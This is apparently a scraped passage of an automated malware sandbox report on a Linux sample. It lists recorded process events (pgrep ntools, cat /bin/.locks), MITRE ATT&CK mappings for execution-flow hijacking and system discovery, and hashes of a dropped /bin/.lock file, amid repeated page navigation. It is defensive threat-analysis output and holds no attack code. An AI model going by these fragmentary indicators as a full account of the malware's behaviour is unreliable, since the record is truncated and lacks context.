1⤵
- Reads CPU attributes
PID:819

/usr/bin/pgrep
pgrep ntools
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:830

/bin/cat
cat /bin/.locks
1⤵
PID:832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Hijack Execution Flow

T1574

Privilege Escalation

Hijack Execution Flow

T1574

Defense Evasion

Hijack Execution Flow

T1574

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/bin/.lock

Filesize
2B

MD5
d784fa8b6d98d27699781bd9a7cf19f0

SHA1
dd122581c8cd44d0227f9c305581ffcb4b6f1b46

SHA256
e16f1596201850fd4a63680b27f603cb64e67176159be3d8ed78a4403fdb1700

SHA512
f8aca02e28996a586f535eed5de9f4533b8b2910762f524459f6fae6fb3f8f7540db5f2c809c1c07167a95b33f6f3f85589af99182e2d2bf93f964de169dd4c0

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads